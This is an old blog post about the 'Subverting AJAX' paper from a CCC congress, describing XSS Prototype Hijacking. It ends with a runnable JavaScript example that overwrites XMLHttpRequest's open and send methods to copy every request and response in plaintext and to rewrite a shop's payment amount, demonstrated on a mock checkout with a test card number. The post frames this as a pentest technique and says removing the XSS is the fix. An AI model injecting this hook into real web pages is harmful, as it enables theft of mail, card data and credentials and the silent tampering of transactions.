January 14, 2007

The Beauty and the Beast

The Chaos Computer Club (CCC) is a very well known European hacker association, and their last congress, held in Berlin last December, produced a lot of interesting material that is worth watching.

The paper that attracted me the most was one about AJAX: the original download link no longer works, but a second copy is still available. The paper is called Subverting AJAX and was written by Stefano di Paola and Giorgio Fedon. It describes a very powerful technique for attacking an AJAX application that they call XSS Prototype Hijacking. Believe me, there is beauty in this attack.

Prototype Hijacking consists in overwriting the methods of the XMLHttpRequest object, the one that takes care of the asynchronous communication with the server. Because the overwritten methods (open, send and the response handler) live on the object's prototype, every instance the application creates afterwards passes through the attacker's code, which intercepts those calls and can therefore read all the private information in the clear, before it is encrypted by the TLS layer or after it has been decrypted, and can replace the information that is sent. The idea is new, but the result is similar to API hooking through DLL injection: the attacker becomes a dangerous beast.

To overwrite the methods they use Cross-Site Scripting (XSS), and they even explain some advanced techniques for doing so. The basic idea is quite simple though: you force the application to run the code that overwrites the methods, and from then on the application's own, unmodified code does the rest.

This is quite powerful. Let me give you a couple of examples where this attack could be used:
  • A webmail application that doesn't filter XSS out of the contents of each mail. With the overwritten methods every communication with the server can be eavesdropped, which means having access to every mail received or sent.
  • An Internet shop, preferably one that lets its users review the products. Payment information can be intercepted and used online.
My recommendation: try this and keep it in your pentest toolbox.
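The hijack described above, and the shop scenario from the list, as an added example that is not code from the paper or from the CCC talk. Since Node has no XMLHttpRequest, a minimal stand-in constructed for this example plays the browser's object and "answers" each request itself; the hijackXMLHttpRequest function, the victim application's checkout code and the shop URL are all constructed for illustration. In a browser the same function would be applied to window.XMLHttpRequest by the injected script.

```javascript
// Added example (not from the paper or the CCC talk): XSS Prototype Hijacking
// of XMLHttpRequest. Node has no XMLHttpRequest, so a stand-in constructed for
// this example plays the browser's object; in a real page the hijack would be
// applied to window.XMLHttpRequest.

// --- Constructed stand-in for the browser's XMLHttpRequest (assumption) ---
// Only open/send/onreadystatechange are modelled; send "answers" at once with a
// JSON acknowledgement, standing in for the real server behind TLS.
class FakeXMLHttpRequest {
  open(method, url) {
    this.method = method;
    this.url = url;
    this.readyState = 1;
  }
  send(body) {
    this.requestBody = body;
    this.status = 200;
    this.responseText = JSON.stringify({ ok: true, received: body });
    this.readyState = 4;
    if (typeof this.onreadystatechange === 'function') this.onreadystatechange();
  }
}

// --- The hijack: what the injected script installs on the prototype ---
// `sink` receives a copy of every request and response in the clear; `rewrite`
// may return a replacement request body, which is what the server then gets.
function hijackXMLHttpRequest(XHR, sink, rewrite) {
  const proto = XHR.prototype;
  const realOpen = proto.open;   // keep the originals so the application keeps working
  const realSend = proto.send;

  proto.open = function (method, url, ...rest) {
    this.__hijacked = { method, url };          // remember where this request goes
    return realOpen.call(this, method, url, ...rest);
  };

  proto.send = function (body) {
    const meta = this.__hijacked || {};
    // Wrap the application's own handler (set before send) so the plaintext
    // response is read before the application sees it.
    const appHandler = this.onreadystatechange;
    this.onreadystatechange = function (...args) {
      if (this.readyState === 4) {
        sink.push({ direction: 'response', url: meta.url, body: this.responseText });
      }
      if (typeof appHandler === 'function') return appHandler.apply(this, args);
    };
    const sent = rewrite ? rewrite(meta, body) : body;
    sink.push({ direction: 'request', method: meta.method, url: meta.url, body, sent });
    return realSend.call(this, sent);
  };
}

// --- The victim shop's checkout code, untouched by the attacker (constructed) ---
function applicationCheckout(XHR, card) {
  const xhr = new XHR();
  let result = null;
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) result = JSON.parse(xhr.responseText);
  };
  xhr.open('POST', 'https://shop.example/api/pay');   // hypothetical endpoint
  xhr.send(JSON.stringify({ card, amount: 19.99 }));
  return result;   // synchronous here only because the stand-in answers at once
}

// --- Demonstration: install the hijack, then let the application run ---
function demo() {
  // Fresh subclass so demo() can be run more than once without double-wrapping.
  const XHR = class extends FakeXMLHttpRequest {};
  const captured = [];   // a real payload would ship these to the attacker's host
  hijackXMLHttpRequest(XHR, captured, (meta, body) => {
    // Tamper with the payment only; everything else goes through untouched.
    if (meta.url && meta.url.endsWith('/api/pay')) {
      const order = JSON.parse(body);
      order.amount = 0.01;
      return JSON.stringify(order);
    }
    return body;
  });
  const appResult = applicationCheckout(XHR, '4111111111111111');
  return { captured, appResult };
}

console.log(JSON.stringify(demo(), null, 2));
```

Nothing in the application's own code changes, which is why the page cannot notice the hijack from the inside: the card number is read from the request before it reaches TLS, and the server receives the rewritten amount while the application sees a normal acknowledgement. The response hook relies on the application assigning onreadystatechange before calling send, as most AJAX code does; the only real fix is to remove the XSS that lets the attacker's script run in the page in the first place.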
